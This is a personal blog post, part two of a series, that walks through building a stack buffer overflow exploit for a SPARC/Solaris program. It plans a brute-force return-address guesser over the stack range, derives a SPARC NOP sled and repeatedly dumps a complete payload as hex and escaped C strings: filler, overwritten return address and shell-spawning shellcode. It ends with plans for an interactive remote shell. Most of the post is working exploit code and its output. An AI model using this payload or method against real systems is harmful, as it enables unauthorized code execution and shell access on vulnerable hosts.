Holy Mother of Pearl – Pt. II

Posted on October 15, 2014 by michaelbazzinott001 — No Comments ↓

Now let’s start perfecting our exploit:

STACK RANGE
0xFFBEE000
.
. 0xFFBEE800
.
. 0xFFBEF000
.
. 0xFFBEF800
.
0xFFBF0000

The above is the typical Stack range for a 32-bit sparc app in 64-bit kernel. That’s as specific as I care for.. We can create a guesser program to, based on nop-sled size, slice the bitspace into potential landing pads and call the vulnerable program for each landing pad until success.

Thus, this program will have the payload and be able to modify it as it goes.

given this line:

 ./build_shellcode_steps asmshell5_interactive.bin; ./alternating_payload3 338 >> payload; printf "\x41\x0a" >> payload

I have 338 bytes of nop slide goodness, 0x152. 8192 / 338 = 24.2 = 24. We can break the stack space into 24 chunks of potential zones where one of them will successfully execute the exploit. I’m assuming I have that many chances anyways..

Writing the automated Stack Shocker
Let me categorize our buffer:
[11111111111][fp][ra][2222222222222222222]
11111 and fp unchanged. ra is changed and 22222 is unchanged

I begin crafting my program.

-bash-4.3$ od -t x1 -A n payload
         01 41 41 41 01 42 42 42 01 43 43 43 01 44 44 44
         01 45 45 45 01 46 46 46 01 47 47 47 01 48 48 48
         01 49 49 49 01 4a 4a 4a 01 4b 4b 4b 01 4c 4c 4c
         01 4d 4d 4d 01 4e 4e 4e 01 4f 4f 4f 01 50 50 50
         01 51 51 51 01 52 52 52 01 53 53 53 01 54 54 54
         01 55 55 55 01 56 56 56 01 57 57 57 01 58 58 58
         01 59 59 59 01 5a 5a 5a 02 41 41 41 02 42 42 42
         02 43 43 43 02 44 44 44 02 45 45 45 02 46 46 46
         02 47 47 47 02 48 48 48 02 49 49 49 02 4a 4a 4a
         02 4b 4b 4b 02 4c 4c 4c 02 4d 4d 4d 02 4e 4e 4e
         02 4f 4f 4f 02 50 50 50 02 51 51 51 02 52 52 52
         02 53 53 53 02 54 54 54 02 55 55 55 02 56 56 56
         02 57 57 57 02 58 58 58 02 59 59 59 02 5a 5a 5a
         03 41 41 41 03 42 42 42 03 43 43 43 03 44 44 44
         03 45 45 45 03 46 46 46 03 47 47 47 03 48 48 48
         03 49 49 49 03 4a 4a 4a 03 4b 4b 4b 03 4c 4c 4c
         03 4d 4d 4d 03 4e 4e 4e 03 4f 4f 4f 03 50 50 50
         03 51 51 51 03 52 52 52 03 53 53 53 03 54 54 54
         03 55 55 55 03 56 56 56 03 57 57 57 03 58 58 58
         03 59 59 59 03 5a 5a 5a 04 41 41 41 04 42 42 42
         04 43 43 43 04 44 44 44 ff be fe 68 ff be fe 50
         11 0b d8 9a 90 12 21 6e d0 23 a0 54 11 0b dc da
         d0 23 a0 58 11 0b 5a 40 d0 23 a0 5c c0 23 a0 60
         90 03 a0 54 d0 23 a0 48 90 03 a0 5c d0 23 a0 4c
         c0 23 a0 50 90 03 a0 54 92 03 a0 48 94 1b 40 0d
         82 10 20 3b 91 d0 20 08 90 1b 40 0d 82 10 20 01
         91 d0 20 08 0a

-bash-4.3$ od -t x1 -A n payload | sed 's/      //g'
 01 41 41 41 01 42 42 42 01 43 43 43 01 44 44 44
 01 45 45 45 01 46 46 46 01 47 47 47 01 48 48 48
 01 49 49 49 01 4a 4a 4a 01 4b 4b 4b 01 4c 4c 4c
 01 4d 4d 4d 01 4e 4e 4e 01 4f 4f 4f 01 50 50 50
 01 51 51 51 01 52 52 52 01 53 53 53 01 54 54 54
 01 55 55 55 01 56 56 56 01 57 57 57 01 58 58 58
 01 59 59 59 01 5a 5a 5a 02 41 41 41 02 42 42 42
 02 43 43 43 02 44 44 44 02 45 45 45 02 46 46 46
 02 47 47 47 02 48 48 48 02 49 49 49 02 4a 4a 4a
 02 4b 4b 4b 02 4c 4c 4c 02 4d 4d 4d 02 4e 4e 4e
 02 4f 4f 4f 02 50 50 50 02 51 51 51 02 52 52 52
 02 53 53 53 02 54 54 54 02 55 55 55 02 56 56 56
 02 57 57 57 02 58 58 58 02 59 59 59 02 5a 5a 5a
 03 41 41 41 03 42 42 42 03 43 43 43 03 44 44 44
 03 45 45 45 03 46 46 46 03 47 47 47 03 48 48 48
 03 49 49 49 03 4a 4a 4a 03 4b 4b 4b 03 4c 4c 4c
 03 4d 4d 4d 03 4e 4e 4e 03 4f 4f 4f 03 50 50 50
 03 51 51 51 03 52 52 52 03 53 53 53 03 54 54 54
 03 55 55 55 03 56 56 56 03 57 57 57 03 58 58 58
 03 59 59 59 03 5a 5a 5a 04 41 41 41 04 42 42 42
 04 43 43 43 04 44 44 44 ff be fe 68 ff be fe 50
 11 0b d8 9a 90 12 21 6e d0 23 a0 54 11 0b dc da
 d0 23 a0 58 11 0b 5a 40 d0 23 a0 5c c0 23 a0 60
 90 03 a0 54 d0 23 a0 48 90 03 a0 5c d0 23 a0 4c
 c0 23 a0 50 90 03 a0 54 92 03 a0 48 94 1b 40 0d
 82 10 20 3b 91 d0 20 08 90 1b 40 0d 82 10 20 01
 91 d0 20 08 0a

-bash-4.3$ od -t x1 -A n payload | sed 's/      //g' | sed 's/ /\\x/g'
\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44
\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48
\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c
\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50
\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54
\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58
\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42
\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46
\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a
\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e
\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52
\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56
\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a
\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44
\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48
\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c
\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50
\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54
\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58
\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42
\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50
\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda
\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60
\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c
\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d
\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01
\x91\xd0\x20\x08\x0a

further continuing this:

-bash-4.3$ od -t x1 -A n payload | sed 's/      //g' | sed 's/ /\\x/g' | sed 's/^/"/g' | sed 's/$/"/g'
"\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44"
"\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48"
"\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c"
"\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50"
"\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54"
"\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58"
"\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42"
"\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46"
"\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a"
"\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e"
"\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52"
"\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56"
"\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a"
"\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44"
"\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48"
"\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c"
"\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50"
"\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54"
"\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58"
"\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42"
"\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50"
"\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda"
"\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60"
"\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c"
"\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x0a"
""
-bash-4.3$ od -t x1 -A n payload | sed 's/      //g' | sed 's/ /\\x/g' | sed 's/^/"/g' | sed 's/$/"/g' | sed 's/""//'
"\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44"
"\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48"
"\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c"
"\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50"
"\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54"
"\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58"
"\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42"
"\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46"
"\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a"
"\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e"
"\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52"
"\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56"
"\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a"
"\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44"
"\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48"
"\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c"
"\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50"
"\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54"
"\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58"
"\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42"
"\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50"
"\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda"
"\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60"
"\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c"
"\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x0a"

There is one problem. the payload.. it doesn’t have a nopsled..
each sparc instruction is 4 bytes and must be aligned properly.. word-aligned.
that means I really have 336 bytes to work with, 336/4 = 84 nop instructions.

i need a nop instruction:

# using the previous developed od2sc above.. 

bazz@life[pts/6][~/latest] printf ".globl main\nmain:\nxor %%g1,%%g1,%%g0\n" > /tmp/nop.S; buildsc /tmp/nop; od2sc /tmp/nop.bin
"\x80\x18\x40\x01"

Although this program doesn’t have to be made in C, I am now migrating it to C in anticipation of using it with a raw PTY in the remote exploit later on.. Actually. I just discovered that I can do the following:

bazz@life[pts/6][~/latest] (cat; cat payload cat)
dfd
dfd
AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDD���h���P
                                                                                                                ؚ�!n�#�T
                                                                                                                       ���#�X
                                                                                                                             Z@�#�\�#�`��T�#�H�� �� ��#�P��T��H�
dfd
dfd
bazz@life[pts/6][~/latest]

After interacting with cat.. I can CTRL-D (not ctrl-C), and then the other program will run.. That’s great.. maybe I can make this whole exploit in bash after all… BUT! That wouldn’t allow a raw terminal session experience in the remote shell. Things like signals or CTRL-characters would be interpreted by the local shell in a “cat” session. Thus, I’m going for the C solution. Plus I just tried using expect, holy God, catting a binary string is impossible <_< of course I only spent 5 minutes on it! I have tools I can do this in seconds on :) I am running out.. time to call it a night. But before I do: TO-DO
1) in PTY:
Allocate signals:
1) Sending payload
2) Respawning target process w/ new return address in payload
Add logic:
deallocate signals when the exploit is successful and we are in the shell.
2) Write the NOP-sled adjusting logic in bash. We can Cify it later

TO BE CONTINUED

Posted in Bash, buffer overflow, Sparc/Solaris

Holy Mother of Pearl – Pt. II

Leave a Reply Cancel reply